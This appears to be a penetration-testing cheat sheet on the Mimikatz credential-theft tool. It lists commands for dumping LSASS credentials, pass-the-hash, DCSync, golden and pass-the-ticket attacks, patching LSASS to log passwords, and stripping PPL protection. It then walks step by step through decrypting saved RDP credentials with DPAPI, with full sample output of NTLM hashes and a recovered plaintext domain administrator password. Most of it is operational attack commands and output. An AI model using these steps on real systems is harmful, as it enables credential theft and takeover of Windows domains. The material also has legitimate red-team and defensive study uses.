Mimikatz is a common tool to extract credentials from Microsoft Windows systems, which can be downloaded here; https://github.com/gentilkiwi/mimikatz
A PowerShell port of Mimikatz is also available here: https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1
Mimikatz Commands
Privilege Escalation
Command | Description |
---|---|
privilege::debug | Enable debug privileges. |
token::elevate | Elevate current process token. |
token::revert | Revert token privileges. |
token::whoami | Display information about the current user’s token. |
Password Extraction and Manipulation
Command | Description |
---|---|
sekurlsa::logonpasswords | Extract credentials from memory. |
lsadump::sam | Extract the SAM database. |
sekurlsa::wdigest | Extract WDigest credentials. |
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM_hash> | Perform pass-the-hash attack. |
sekurlsa::ekeys | List kerberos keys. |
lsadump::dcsync /domain:<DomainFQDN> /all | Perform a DCSync attack against a domain controller. |
sekurlsa::minidump lsass.DMP | Extract passwords from a minidump file. |
Kerberos Attacks
Command | Description |
---|---|
kerberos::list | List Kerberos tickets in memory. |
sekurlsa::tickets /export | Export Kerberos tickets. |
sekurlsa::tickets /purge | Purge Kerberos tickets from memory. |
kerberos::ptt <ticket_file> | Pass-the-ticket: Import Kerberos ticket from a file. |
kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ticket:<ticket_file> | Create a Kerberos golden ticket. |
kerberos::tgt | Dump current TGT information. |
kerberos::ptc <target_SPN> | Pass-the-credential: Request service ticket based on current TGT for a given SPN. |
kerberos::list /export | Export Kerberos tickets to file. |
Crypto & Certificate Operations
Command | Description |
---|---|
crypto::capi | Patches the CryptoAPI to make keys exportable. |
crypto::certificates | List certificates in memory. |
crypto::keys | List keys in memory. |
crypto::certificates /export | Export certificates. |
DPAPI & Windows Credential Vault
Command | Description |
---|---|
dpapi::masterkey /in:<masterkey_file> | Load DPAPI master key from a file. |
dpapi::cache | List DPAPI credentials cache. |
dpapi::cred /in:C:\key\location /masterkey:<MASTERKEY> | Decrypt a DPAPI encrypted file using a masterkey |
vault::list | List Windows vault credentials. |
sekurlsa::dpapi | Dump DPAPI keys for all users. |
Miscellaneous
Command | Description |
---|---|
misc::memssp | Patches LSASS so credentials are logged to C:\Windows\System32\mimilsa.log. |
Usage Examples
One Line Commands
If you’re executing Mimikatz from a non-interactive command shell, parameters supplied need to be encapsulated in double quotes, as per the below example;
C:\Tools>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 1648146 (00000000:00192612)
Session : Interactive from 5
User Name : alice
Domain : BORDERGATE
Logon Server : DC01
Logon Time : 29/04/2024 17:30:10
SID : S-1-5-21-1220112391-3624315575-3511410581-1104
msv :
[00000003] Primary
* Username : alice
* Domain : BORDERGATE
* NTLM : 64f12cddaa88057e06a81b54e73b949b
* SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8
* DPAPI : 7392169935f1a74665da82b62773cff3
Removing PPL Protection from LSASS
Upload mimidriver.sys driver to the same directory as your running Mimikatz from, then execute the following commands to remote PPL protection from LSASS.
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
The driver can be removed with:
mimikatz # !processprotect /process:lsass.exe
mimikatz # !-
Extracting Windows Vault RDP Credentials
Mimikatz can be used to extract saved Credential Manager passwords, such as saved RDP credentials.
First, we need to list the credentials available, which are stored in a users AppData folder;
dir /a C:\Users\alice\AppData\Local\Microsoft\Credentials\
Volume in drive C has no label.
Volume Serial Number is 2AD5-BF62
Directory of C:\Users\alice\AppData\Local\Microsoft\Credentials
01/05/2024 18:43 <DIR> .
01/05/2024 18:41 <DIR> ..
01/05/2024 18:43 396 AA1843CE085D8B96A03D81C3D6CD5F07
29/04/2024 18:29 11,052 DFBE70A7E5CC19A398EBF1B96859CE5D
2 File(s) 11,448 bytes
2 Dir(s) 50,326,667,264 bytes free
We can then used Mimikatz to find which master encryption key is associated with a credential:
mimikatz # dpapi::cred /in:C:\Users\alice\AppData\Local\Microsoft\Credentials\AA1843CE085D8B96A03D81C3D6CD5F07
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {22df88d6-46f5-4560-9d07-b905b6399b34}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 6c9182a4f6dd09325d57ad0aba6d3b8b
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 532c59ee0aa855aa6149b85fcab9dd62
dwDataLen : 000000c8 - 200
pbData : 16946411679f4b62b3895689e4cfe8986a1b55ddb50a5e4744ad991ef972c3159f962b8322b3a1a76539e5dc58398322976459afb66b2aa7fc0f43b954959e920e797deda07bf85d10a4f92d8d6ab18d5b0f8b40b419a89348609b3965ac35fe7de72d159317d57c00a331d2d0e949827d39c05d9c9db576c61aa899ceaa403468bed3f6a0c3bbf5d921285993cbbfe332233c7b17b48dad7c542f0622561c8baf107cca67946869e32e8e1b6c44f29a775b78e8334b1db047852c1f76b2a2e206dda3431d4229fe
dwSignLen : 00000014 - 20
pbSign : 7d0232eee442038935c1ff4c2d36ae813052ed39
Mimikatz can then be used to decrypt the master encryption key:
mimikatz # dpapi::masterkey /in:C:\Users\alice\AppData\Roaming\Microsoft\Protect\S-1-5-21-1220112391-3624315575-3511410581-1104\22df88d6-46f5-4560-9d07-b905b6399b34 /rpc
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {22df88d6-46f5-4560-9d07-b905b6399b34}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 874710a496905265bff3b8d7c32a9ce5
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 852645998d9f798f7f587da5e0168678f3b948796de93a32d8ec5b76e8da2a818e3d48e484a276cc85a08606cad8de5cf6eeda708f1c2b0ab39ae8b49164a35539bcc20fcb36b756ad9a739b429626f56a8ab41e1d2e3925686e4a918ac2a8e103df57406c41603c
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : e6cad989a10dfd8c3006f1c7189ff1c7
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 215aae5e4f871dd1bbff35da4d2327a18b3c2e6d5e1b3a66357a995e6f9601a5ec7d7dc7479ec71a0e6d9ed1ba880527688ac6e961a5b6dfee4fccea65f787f9df79dcfb241e22f7
[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {b357e77b-14ca-40b1-8bbb-4519ccd27f56}
pbSecret : ae90378cef835e995f1b0f7f6dff82914c2897e567ec0c93916b06418b383037d973700b34c36cb2ed82c774197f737b4738275616b0a26721aa836dd8720e166d2d709133a130417845adb36a0a988f40cca376e73ff2083660b2816bec030db585aa5bd90bdf9983e701642d9f2b91bbe5a79649c3014b62b094e4aeaaa87c905195d10c6eb70c074a79ccf1c76d02132fc32bbd818d969991c5e7e8b5347a743bc697d9f70296c438475ad7e8705220d545950a8eb2b43679e3c12b8f2b6932fc2b0d0786c9c4d3f0888b63336078751a77fd2064e2bf47b24ca118b266559dbd0eea136fb7b3c9b4aeba90e7c5f903f23efdfeee7253c18e5d2f55e3d96c
pbAccesscheck : a9bf58ff84d39b1342d054382143ddfc0d0da80baa7f90e8bc6c1fdda8cd728d4ae01e37697cf36ac54a2cdc9db8d87ec86ac4cd511e66471b1dcb50fd94e73cdcf30553b70881fe06f87ba802fda40beaa9d13c50a24a67
Auto SID from path seems to be: S-1-5-21-1220112391-3624315575-3511410581-1104
[backupkey] without DPAPI_SYSTEM:
key : 1bef6c3f1d68fed793f40adf81f40af5fad20c7b6a7a260c6b03e249d05dc823
sha1: 87b7a5d5fffc653128d09c0a65afe9470b7d2c07
[domainkey] with RPC
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
key : 14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263
sha1: b535443c8c459fe08911f85779f1bbed0bf9bef6
Using the masterkey we just extracted, we can decrypt the RDP password.
mimikatz # dpapi::cred /in:C:\Users\alice\AppData\Local\Microsoft\Credentials\AA1843CE085D8B96A03D81C3D6CD5F07 /masterkey:14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {22df88d6-46f5-4560-9d07-b905b6399b34}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 6c9182a4f6dd09325d57ad0aba6d3b8b
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 532c59ee0aa855aa6149b85fcab9dd62
dwDataLen : 000000c8 - 200
pbData : 16946411679f4b62b3895689e4cfe8986a1b55ddb50a5e4744ad991ef972c3159f962b8322b3a1a76539e5dc58398322976459afb66b2aa7fc0f43b954959e920e797deda07bf85d10a4f92d8d6ab18d5b0f8b40b419a89348609b3965ac35fe7de72d159317d57c00a331d2d0e949827d39c05d9c9db576c61aa899ceaa403468bed3f6a0c3bbf5d921285993cbbfe332233c7b17b48dad7c542f0622561c8baf107cca67946869e32e8e1b6c44f29a775b78e8334b1db047852c1f76b2a2e206dda3431d4229fe
dwSignLen : 00000014 - 20
pbSign : 7d0232eee442038935c1ff4c2d36ae813052ed39
Decrypting Credential:
* volatile cache: GUID:{22df88d6-46f5-4560-9d07-b905b6399b34};KeyHash:b535443c8c459fe08911f85779f1bbed0bf9bef6;Key:available
* masterkey : 14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000c2 - 194
credUnk0 : 00000000 - 0
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 01/05/2024 14:43:56
unkFlagsOrSize : 00000018 - 24
Persist : 00000002 - 2 - local_machine
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:target=TERMSRV/DC01
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : BORDERGATE\Administrator
CredentialBlob : Password1
Attributes : 0
Common Errors
If you receive the error message kuhl_m_sekurlsa_acquireLSA, ensure you are running the command in an Adminstrator command prompt, and that the privilege::debug command has been issued first;
mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1648146 (00000000:00192612)
Session : Interactive from 5
User Name : alice
Domain : BORDERGATE
Logon Server : DC01
Logon Time : 29/04/2024 18:00:10
SID : S-1-5-21-1220112391-3624315575-3511410581-1104
msv :
[00000003] Primary
* Username : alice
* Domain : BORDERGATE
* NTLM : 64f12cddaa88057e06a81b54e73b949b
* SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8
* DPAPI : 7392169935f1a74665da82b62773cff3